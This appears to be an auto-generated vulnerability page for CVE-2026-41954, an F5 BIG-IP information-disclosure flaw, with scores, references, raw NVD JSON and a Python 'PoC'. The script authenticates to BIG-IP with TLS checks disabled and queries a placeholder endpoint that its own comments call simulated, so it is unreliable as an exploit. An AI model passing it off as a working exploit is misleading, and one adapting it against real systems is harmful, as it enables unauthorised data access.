CVE-2026-41954

Description

Sensitive information disclosure vulnerability exists in the undisclosed iControl REST endpoint and TMOS Shell (tmsh) command which may allow an authenticated attacker with resource administrator role privileges to view sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

F5 BIG-IP (所有受支持版本，具体以厂商公告 K32950402 为准)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-41954 (Conceptual Example)
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_poc(target_ip, username, password):
    # F5 BIG-IP Management URL
    base_url = f"https://{target_ip}/mgmt"
    
    # 1. Authenticate to get the token
    auth_url = f"{base_url}/shared/authn/login"
    auth_payload = {
        "username": username,
        "password": password,
        "loginProviderName": "tmos"
    }
    
    session = requests.Session()
    session.verify = False
    
    try:
        print(f"[*] Attempting to authenticate as {username}...")
        resp = session.post(auth_url, json=auth_payload)
        if resp.status_code != 200:
            print("[-] Authentication failed.")
            return
        
        token = resp.json().get('token', {}).get('token')
        headers = {
            "X-F5-Auth-Token": token,
            "Content-Type": "application/json"
        }
        
        # 2. Access undisclosed sensitive endpoint (Simulated)
        # Note: Replace with actual endpoint path if disclosed
        vuln_endpoint = f"{base_url}/tm/undisclosed/sensitive/config"
        print(f"[*] Sending request to vulnerable endpoint: {vuln_endpoint}")
        
        vuln_resp = session.get(vuln_endpoint, headers=headers)
        
        if vuln_resp.status_code == 200:
            print("[+] Successfully retrieved sensitive information!")
            print("[+] Data:")
            print(vuln_resp.text)
        else:
            print(f"[-] Request failed with status code: {vuln_resp.status_code}")
            
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    TARGET = "<BIG_IP_IP>"
    USER = "resource_admin"
    PASS = "<PASSWORD>"
    check_poc(TARGET, USER, PASS)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41954
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41954
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41954/
[4] VulDB https://vuldb.com/cve/CVE-2026-41954
[5] https://my.f5.com/manage/s/article/K32950402

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41954", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:45.600", "lastModified": "2026-05-13T16:27:11.127", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sensitive information disclosure vulnerability exists in the undisclosed iControl REST endpoint and TMOS Shell (tmsh) command which may allow an authenticated attacker with resource administrator role privileges to view sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K32950402", "source": "[email protected]"}]}}